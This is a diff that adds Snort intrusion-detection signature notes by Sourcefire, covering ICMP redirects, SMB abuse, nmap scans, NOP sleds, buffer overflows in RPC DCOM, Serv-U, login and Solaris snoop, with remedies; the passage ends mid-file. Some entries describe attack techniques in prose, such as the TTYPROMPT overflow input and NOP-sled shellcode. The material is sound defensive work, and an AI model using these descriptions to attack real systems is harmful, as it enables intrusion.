+ICMP Redirect messages are generated by gateway devices when a shorter route to the destination exists.  When a gateway device receives an Internet datagram from a host on the same network a check is performed to determine the address of the next hop (gateway) in the route to the datagrams destination.  The datagram is then forward to the next hop on the route.  If this gateway device is also on the same network, the gateway device generates an ICMP Redirect message and sends it back to the host that originally generated the traffic.  The ICMP redirect message informs the original host that a shorter route exists and any additional traffic should be forwarded directly to the closer gateway device.
+
+--
+
+Attack Scenarios:
+Attackers on the local subnet could potentially use ICMP Redirect messages to force hosts to use compromised gateway devices.  
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+ICMP Redirect datagrams are legitimate Internet traffic if a shorter route to a destination actually exists.  
+
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Ingress filtering should be utilized to block incoming ICMP Type 5 datagrams
+
+--
+
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+RFC792
+
+
+--
--- /dev/null
+++ b/doc/signatures/2987.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+2987
+
+--
+Summary:
+This event is generated when an attempt is made to create an AndX entry
+via SMB.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to create an AndX entry
+via SMB.
+
+--
+Affected Systems:
+	Windows systems
+
+--
+Attack Scenarios:
+An attacker may attempt to bind to the service to manipulate host
+settings then create an entry in the winreg service.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+Microsoft Technet
+http://support.microsoft.com/support/kb/articles/q153/1/83.asp
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0562
+Winreg
+http://www.rutherfurd.net/python/winreg/
+
+--
--- /dev/null
+++ b/doc/signatures/1632.txt
@@ -0,0 +1,51 @@
+Rule:
+
+--
+Sid: 1632
+
+--
+Summary:
+This event is generated when activity relating to network chat clients is detected.
+
+--
+Impact:
+Policy Violation. Use of chat clients to communicate with unkown external sources may be against the policy of many organizations.
+
+--
+Detailed Information:
+Instant Messaging (IM) and other chat related client software can allow users to transfer files directly between hosts. This can allow malicious users to circumvent the protection offered by a network firewall.
+
+Vulnerabilities in these clients may also allow remote attackers to gain unauthorized access to a host.
+
+--
+Attack Scenarios:
+A user may transfer sensitive company information to an external party using the file transfer capabilities of an IM client.
+
+An attacker might utilize a vulnerability in an IM client to gain access to a host, then upload a Trojan Horse program to gain control of that host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow the use of IM clients on the protected network and enforce or implement an organization wide policy on the use of IM clients.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/484.txt
@@ -0,0 +1,51 @@
+Rule:
+--
+Sid:
+484
+
+--
+Summary:
+This event is generated when an ICMP echo request is made from a host running Sniffer Pro/NetXRay software.
+
+--
+Impact:
+Information gathering.  An ICMP echo request can determine if a host is active.
+
+--
+Detailed Information:
+An ICMP echo request is used by the ping command to elicit an ICMP echo reply from a listening live host.  An echo request that originates from a Windows host running Sniffer Pro/NetXRay software contains a unique payload in the message request.
+
+--
+Affected Systems:
+All
+
+--
+Attack Scenarios:
+An attacker may attempt to determine live hosts in a network prior to launching an attack.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+An ICMP echo request may be used to legimately troubleshoot networking problems.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block inbound ICMP echo requests.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/648.txt
@@ -0,0 +1,77 @@
+Rule:
+--
+Sid:
+648
+
+--
+Summary:
+A series of NOP instructions for Intel's x86 architecure was detected.
+
+--
+Impact:
+As part of an attack on a remote service, an attacker may attempt to
+take advantage of insecure coding practices in hopes of executing
+arbitrary code.  This procedure generally makes use of NOPs.
+
+--
+Detailed Information:
+The NOP allows an attacker to fill an address space with a large
+number of NOPs followed by his or her code of choice.  This allows
+"sledding" into the attackers shellcode.
+
+--
+Affected Systems:
+	All x86 based systems
+
+--
+Attack Scenarios:
+If a particular service was written using unsafe functions without
+bounds checking (strcpy(), strcat(), sprintf() etc...), it is possible
+to write arbitrary data to the address space of the service.
+Normally, this may just cause the program to die a horrible death.
+However, if you can get the return address to point to the beginning
+of the newly written data, it is possible to execute code of your
+choice.  This requires that the newly written data is actual
+executable data.  Since calculating exactly where the return address
+may point to is no small task, a popular technique is to pad the space
+leading up to your shellcode with NOPs.  This way, if the return
+address points anywhere in the series of NOPS, execution will slide
+down into your shellcode.
+
+--
+Ease of Attack:
+Not-so trivial.  This particular technique requires a knowledge of x86
+assembly coding, memory, and usually an intimate understanding of the
+code that one is attempting to exploit.  Unfortunately, there are
+hundreds upon hundreds of canned exploits that nearly anyone with the
+ability point-and-click can use and wreak havok with.
+
+--
+False Positives:
+The x86 NOP can frequently be found in day-to-day traffic,
+particularly when transfering large files. 
+
+--
+False Negatives:
+There are other techniques to emulate a NOP.  Additionally, if
+the attackers NOP sled is small enough (< 15), this particular attack
+may slip by.  Fortunately, NOP sleds are generally quite large.
+
+--
+Corrective Action:
+Determine if this NOP was part of an attack or simply part of an
+innocent stream of data.
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Jon Hart <warchild@spoofed.org>
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/3295.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3295
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000651.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+100000651
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "MyPHP Guestbook" application running on a 
+webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "homepage" parameter in the "index.php" script 
+used by the "MyPHP Guestbook" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using MyPHP Guestbook
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/796.txt
@@ -0,0 +1,65 @@
+
+Rule:  
+
+--
+Sid:
+796
+
+--
+Summary:
+This rule has been placed in deleted.rules. It has been superceded by
+sid 721.
+
+--
+Impact:
+Mail worms may spread rapidly because users execute them.
+
+--
+Detailed Information:
+Windows systems are often configured not to display file extensions.
+By adding a second extension, users get confused and think that an
+executable is an EXCEL spreadsheet - e.g. businnesplan.xls.vbs gets displayed as
+businessplan.xls but is a visual basic script and not an EXCEL spreadsheet.
+
+--
+Affected Systems:
+ 
+--
+Attack Scenarios:
+Famous worms (ILOVEYOU, KOURNIKOVA) are based on this method. Warning:
+An EXCEL spreadsheet is in now way more secure than a visual basic script.
+Wrongly configured antivirus software my ignore this files and
+let a macro virus pass.
+
+--
+Ease of Attack:
+Very easy. One needs to attach a file and hope that it gets executed.
+
+--
+False Positives:
+None Known
+Could be an error on sender's side.
+
+--
+False Negatives:
+None Known
+-
+
+--
+Corrective Action:
+Use antivirus software. Configure mail clients securely, especially when
+using windows desktops. Educate your mail users. Deny all attachments at
+the gateway if you can.
+
+--
+Contributors:
+Original rule writer unknown
+Snort documentation contributed by tobias.haecker@to.com
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+See websites of antivirus companies.
+
+--
--- /dev/null
+++ b/doc/signatures/1003.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid: 1003
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a potential weakness on a host running Microsoft Internet Information Server (IIS). 
+
+--
+Impact:
+Information gathering possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential weaknesses in a host running Microsoft IIS.
+
+The attacker may be trying to gain information on the IIS implementation on the host, this may be the prelude to an attack against that host using that information.
+
+The attacker may also be trying to gain administrator access to the host, garner information on users of the system or retrieve sensitive customer information.
+
+Some applications may store sensitive information such as database connections, user information, passwords and customer information in files accessible via a web interface. Care should be taken to ensure these files are not accessible to external sources.
+
+--
+Affected Systems:
+Any host using IIS.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the IIS implementation. The attacker might then gain administrator access to the site, deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/2546.txt
@@ -0,0 +1,60 @@
+Rule:
+
+-- 
+Sid: 
+2546 
+
+-- 
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the Serv-U FTP server, namely the MDTM buffer overflow.
+
+--
+Impact:
+Serious. Denial of service is possible; when combined with shellcode,
+arbitrary code can be remotely executed with SYSTEM privileges.
+
+-- 
+Detailed Information:
+The vulnerability in question is a buffer overflow present in the handling 
+of the MDTM command in the RhinoSoft Serv-U FTP server for Windows. 
+
+The rule searches for an MDTM command which is not terminated within 100 
+characters; no valid command would be longer than this.
+
+--
+Affected Systems:
+All versions of RhinoSoft Serv-U FTP 4.2 and earlier.
+
+--
+Attack Scenarios:
+Several scripts exist to exploit this flaw, and shellcode is publicly available. 
+An attacker could either use one of these scripts, craft their own, or simply 
+manually enter an MDTM command which triggers the overflow after having logged 
+into a vulnerable server.
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+None Known
+
+-- 
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+-- 
+Contributors:
+Sourcefire Vulnerability Research Team
+Alex Kirk <alex.kirk@sourcefire.com> 
+
+-- Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/629.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+629
+
+--
+Summary:
+This event is generated when the nmap port scanner and reconnaissance 
+tool is used against a host.
+
+When run with the '-O' option, it attempts to identify the remote  
+operating system.
+
+--
+Impact:
+Can provide useful reconnaissance information to an attacker.  Has been
+known to cause a denial of service on some older  hosts.
+
+--
+Detailed Information:
+nmap attempts to identify the remote operating system by looking for
+different services that are common or specific to  particular operating
+systems.  It also sends a variety of abnormal packets that are often
+handled differently by different  operating systems so that it can
+differentiate between them based on the responses.
+
+--
+Affected Systems:
+All
+
+--
+Attack Scenarios:
+nmap is often used before an attempt to gain access to a system.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None known.  The signature may be produced by other scanners but is
+unlikely to be used for legitimate activity.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block any TCP packets that have the SYN, FIN, PUSH and URGENT flags set
+using a firewall.  Block only packets that have all four of the flags
+set as they are individually and in other combinations necessary for
+normal TCP traffic.  If you block them  individually or in other
+combinations your network will not function correctly.
+
+--
+Contributors:
+Original Rule Writer Unknown (prime suspect is Marty Roesch)
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS05
+
+Nmap scanner:
+http://www.insecure.org
+
+--
--- /dev/null
+++ b/doc/signatures/1387.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+
+1387
+
+--
+Summary:
+
+This event is generated when an attempt is made to overflow a buffer in Microsoft SQL server.
+
+--
+Impact:
+
+A successful attack will allow an attacker to run arbitrary code on the SQL Server using the privileges of the account that SQL Server is running under typically, administrator.
+
+
+--
+Detailed Information:
+
+Microsoft SQL Server has a exploitable overflow in raiserror() function. An attack can inject the malicious SQL commands containing an overly long input in attempt to overflow the buffer.
+
+Moreover, the specifier will enable an attack to execute an arbitrary command in a memory space, leading to a total system compromise.
+ 
+
+--
+Affected Systems:
+
+	Microsoft SQL Server 7.0 
+ 	Microsoft SQL Server 2000
+	
+
+--
+Attack Scenarios:
+
+An attacker could send arbitrary queries to a SQL server through web applications.
+
+--
+Ease of Attack:
+
+Moderately difficult, since the exploit depends on an ability to inject SQL commands to the SQL server.
+
+--
+False Positives:
+
+None known.
+
+--
+False Negatives:
+
+None known.
+
+--
+Corrective Action:
+
+Apply the appropriate vendor supplied patch.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Nawapong Nakjang (tony@ksc.net, tonie@thai.com)
+
+--
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-2002-22.html
+
+--
--- /dev/null
+++ b/doc/signatures/112-3.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+112-3
+
+--
+Summary:
+This event is generated when the pre-processor spp_arpspoof detects
+network traffic that may constitute an attack. Specifically a
+etherframe arp mismatch dst was detected.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This event is generated when the spp_arpspoof pre-processor detects
+network traffic that may consititute an attack.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/1631.txt
@@ -0,0 +1,51 @@
+Rule:
+
+--
+Sid: 1631
+
+--
+Summary:
+This event is generated when activity relating to network chat clients is detected.
+
+--
+Impact:
+Policy Violation. Use of chat clients to communicate with unkown external sources may be against the policy of many organizations.
+
+--
+Detailed Information:
+Instant Messaging (IM) and other chat related client software can allow users to transfer files directly between hosts. This can allow malicious users to circumvent the protection offered by a network firewall.
+
+Vulnerabilities in these clients may also allow remote attackers to gain unauthorized access to a host.
+
+--
+Attack Scenarios:
+A user may transfer sensitive company information to an external party using the file transfer capabilities of an IM client.
+
+An attacker might utilize a vulnerability in an IM client to gain access to a host, then upload a Trojan Horse program to gain control of that host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow the use of IM clients on the protected network and enforce or implement an organization wide policy on the use of IM clients.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2438.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2438
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Real Networks RealPlayer/RealOne player.
+
+--
+Impact:
+Serious. Execution of arbitrary code.
+
+--
+Detailed Information:
+RealNetworks RealPlayer/RealOne player is a streaming media player for
+Microsoft Windows, Apple Macintosh and UNIX/Linux based operating systems.
+
+A buffer overrun condition is present in some versions of the player
+that may present a remote attacker with the opportunity to execute code
+of their choosing on a client using one of these players.
+
+--
+Affected Systems:
+	Real Networks RealOne Desktop Manager
+	Real Networks RealOne Enterprise Desktop 6.0.11 .774
+	Real Networks RealOne Player 1.0
+	Real Networks RealOne Player 2.0
+	Real Networks RealOne Player 6.0.11 .868
+	Real Networks RealOne Player version 2.0 for Windows
+	Real Networks RealPlayer 8.0 Win32
+	Real Networks RealPlayer 8.0 Unix
+	Real Networks RealPlayer 8.0 Mac
+	Real Networks RealPlayer 10.0 BETA
+
+--
+Attack Scenarios:
+An attacker may supply a malformed file to the client to exploit the
+issue.
+
+--
+Ease of Attack:
+Simple. 
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3147.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+3147
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+buffer overflow vulnerability affecting "login" via Telnet.
+
+--
+Impact:
+Serious. Unauthorized administrative access to the target host.
+
+--
+Detailed Information:
+The login binary is used when establishing an interactive session on a
+system. It is used locally and by protocols that allow remote access. A
+buffer overflow condition exists in some versions of login that can be
+triggered by the manipulation of environment variables.
+
+This event is generated when an attempt is made to overflow login via
+telnet by manipulating the TTYPROMPT environment variable.
+
+--
+Affected Systems:
+	Systems using Sys V derived login
+
+--
+Attack Scenarios:
+An attacker can overflow a buffer by inserting 6 bytes of data followed
+by 65 characters and a newline into the TTYPROMPT variable.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2024.txt
@@ -0,0 +1,84 @@
+Rule:
+
+--
+Sid:
+2024
+
+--
+Summary:
+A vulnerability exists in Solaris snoop such that a remote attacker 
+could gain superuser access when used with the RPC service rquotad
+
+--
+Impact:
+Remote super user access leading to a compromise of the target machine 
+along with any network resources that machine is connected to.
+
+--
+Detailed Information:
+Certain versions of the Solaris operating system use a program to
+monitor network traffic called Snoop. This program contains a flaw such
+that under certain conditions a buffer overflow can be caused by a 
+remote attacker.
+
+One such condition occurs when snoop tries to decode GETQUOTA requests
+to the RPC service rquotad. This daemon sends information regarding disk
+quotas on multi-user systems using remotely mounted shares via NFS. A
+specially crafted long request will trigger this overflow resulting in
+root access on the victim host.
+
+--
+Affected Systems:
+	Sun Solaris 2.4 _x86
+	Sun Solaris 2.4
+	Sun Solaris 2.5 _x86
+	Sun Solaris 2.5
+	Sun Solaris 2.5.1 _x86
+	Sun Solaris 2.5.1 _ppc
+	Sun Solaris 2.5.1
+	Sun Solaris 2.6 _x86
+	Sun Solaris 2.6
+	Sun Solaris 7.0 _x86
+	Sun Solaris 7.0
+
+--
+Attack Scenarios:
+An attacker can send a specially crafted long request to snoop via the 
+rpc.rquotad service such that it will generate a buffer overflow.
+
+--
+Ease of Attack:
+Simple although a requirement is that snoop should be running at the 
+time of attack.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Patches are available for all operating systems and platforms listed as
+affected from Sun. These patches should be applied as soon as possible.
+
+See the Vendor site http://sunsolve.sun.com for details.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/864
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0974
+
+--
--- /dev/null
+++ b/doc/signatures/2484.txt
@@ -0,0 +1,57 @@
+Rule:
+--
+Sid:
+2484
+
+--
+Summary:
+This event is generated when a remote user attempts to access source.jsp
+on a Tomcat web server. This may indicate an attempt to exploit a
+directory traversal vulnerability.
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+This event may indicate an attempt to exploit a vulnerability in the
+source.jsp script. An attacker can use directory traversal techniques
+when accessing source.jsp to view hidden files and directories on the
+web server with the access privileges of the server. 
+
+--
+Affected Systems:
+	Apache Tomcat on Novell Netware 6.0
+
+--
+Attack Scenarios:
+An attacker can use directory traversal techniques when executing
+source.jsp to view directories and files on the web server.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1133.txt
@@ -0,0 +1,66 @@
+Rule:  
+ 
+--
+Sid:
+
+1133
+
+--
+Summary:
+This event is generated when the Cybercop vulnerability scanner is used 
+against a host.
+
+--
+Impact:
+Cybercop can be used to identify vulnerabilities on host systems.
+
+--
+Detailed Information:
+
+This particular packet is a part of Cybercop's OS identification.  
+Specially crafted packets are able to elicit different responses from 
+different operating systems.  This packet is likely to be part of a full
+Cybercop scan rather than an isolated event. 
+
+--
+Affected Systems:
+
+All
+
+--
+Attack Scenarios:
+Cybercop can be used by attackers to determine vulnerabilities present 
+on a host or network of hosts that could be used as attack vectors.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+This tool can be used legitimately by system and network administrators.
+Other vulnerability scanners may display the same behavior.
+
+--
+False Negatives:
+
+None known.
+--
+Corrective Action:
+TCP packets with SYN, FIN and PUSH set at the same time are abnormal, 
+use a packet filtering firewall to block them.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS145
+
+--
--- /dev/null
+++ b/doc/signatures/394.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+
+Sid:
+394
+
+--
+
+Summary:
+This event is generated when an ICMP Destination Host Unknown datagram is detected on the network.  Gateway devices normally generate these ICMP messages when the destination's IP address is unreachable.
+
+--
+
+Impact:
+This rule generates informational events about the network.  Large numbers of these messages on the network could indication routing problems or faulty routing devices.
+
+--
+
+Detailed Information:
+This ICMP message will be generated when the destination host specified in the datagram is unreachable.
+
+--
+
+Attack Scenarios:
+None Known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagrams.
+
+--
+
+False Positives:
+None Known
+
+--
+
+False Negatives:
+None Known
+
+--
+
+Corrective Action:
+This rule detects informational network information, no correct action is necessary.
+
+--
+
+Contributors:
+Original Rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
--- /dev/null
+++ b/doc/signatures/530.txt
@@ -0,0 +1,60 @@
+Rule:  
+
+--
+Sid:
+530
+
+--
+Summary:
+This event is generated when an attacker sends a blank username and blank password in an attempt to connect to the IPC$ (Interprocess Communication) pipe.
+
+--
+Impact:
+Information gathering. This attack can permit the disclosure of sensitive information about the target host.
+
+--
+Detailed Information:
+Null sessions allow browsing of Windows hosts by the "Network Neighborhood" and other functions.  A Null session permits access to a host using a blank user name and password.  At attacker may attempt to perform a Null session connection, disclosing sensitive information about the target host such as available shares and user names.
+
+--
+Affected Systems:
+Microsoft Windows hosts
+
+--
+
+Attack Scenarios:
+An attacker can send a blank username and blank password to try to connect to the IPC$ hidden share on the target computer.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+Null sessions may be used by legitimate processes in the same Windows domain.  
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+On Windows NT, 2000, XP set the registry key /System/CurrentControlSet/Control/LSA/RestrictAnonymous value to 1.
+
+--
+Contributors:
+Original rule written by Ian Viket <ian.vitek@infosec.se>
+Documented by Nawapong Nakjang <tony@ksc.net, tonie@thai.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids
+http://www.whitehats.com/info/IDS204
+
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0519
+
+--
--- /dev/null
+++ b/doc/signatures/2995.txt
@@ -0,0 +1,66 @@
+Rule:
+
+--
+Sid:
+2995
+
+--
+Summary:
+This event is generated when an attempt is made to shutdown a Windows
+system via SMB. 
+
+--
+Impact:
+Serious.
+
+--
+Detailed Information:
+This event indicates that an attempt was made to shutdown a Windows
+system via SMB across the network.
+
+It may be possible for an attacker to manipulate a Windows system
+from a remote location. Shutting down a system may lead to a Denial of
+Service for the target host.
+
+--
+Affected Systems:
+	Microsoft Windows systems.
+
+--
+Attack Scenarios:
+An attacker may be able to manipulate a target system using SMB. The
+attacker may gain complete control over the affected system.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of system compromise.
+
+Turn off file and print sharing on the target host.
+
+Use a packet filtering firewall to disallow SMB access to the host from
+sources external to the protected network.
+
+Disallow remote registry manipulation.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/308.txt
@@ -0,0 +1,55 @@
+Rule:
+
+--
+Sid: 308
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow condition in certain versions of NextFTP for Windows.
+
+--
+Impact:
+Serious. System compromize presenting the attacker with the opportunity to execute arbitrary code.
+
+--
+Detailed Information:
+Certain versions of the NextFTP client from ToxSoft contain a programming error that allows an FTP server to issue commands on the client via exploit code in the server reply.
+
+--
+Attack Scenarios:
+Exploit scripts are available
+
+--
+Ease of Attack:
+Simple. Exploits are available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Use Secure Shell (ssh) for file transfer as opposed to FTP.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0671
+
+Bugtraq:
+http://www.securityfocus.com/bid/572
+
+--
--- /dev/null
+++ b/doc/signatures/2861.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2861
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
